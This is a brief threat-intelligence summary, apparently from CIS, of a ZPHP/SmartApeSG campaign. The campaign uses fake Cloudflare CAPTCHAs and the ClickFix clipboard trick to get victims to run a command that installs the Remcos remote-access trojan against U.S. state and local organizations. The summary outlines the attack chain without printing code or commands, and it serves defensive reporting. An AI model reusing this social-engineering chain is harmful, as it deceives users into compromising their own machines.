ZPHP Campaign Delivering Remcos RAT Impacting SLTTs

CIS CTI warns of an ongoing ZPHP/SmartApeSG campaign targeting U.S. SLTT organizations that injects malicious JavaScript into compromised sites to display fake Cloudflare Turnstile CAPTCHAs and use the ClickFix clipboard trick to make victims execute a command that stages an HTA/PowerShell chain and deploys Remcos RAT (hidden via steganography and DLL sideloading); the report provides technical indicators, example C2 IPs, impact metrics (IDS alerts and nearly 500,000 MDBR-blocked DNS requests across 162 organizations), and mitigation recommendations.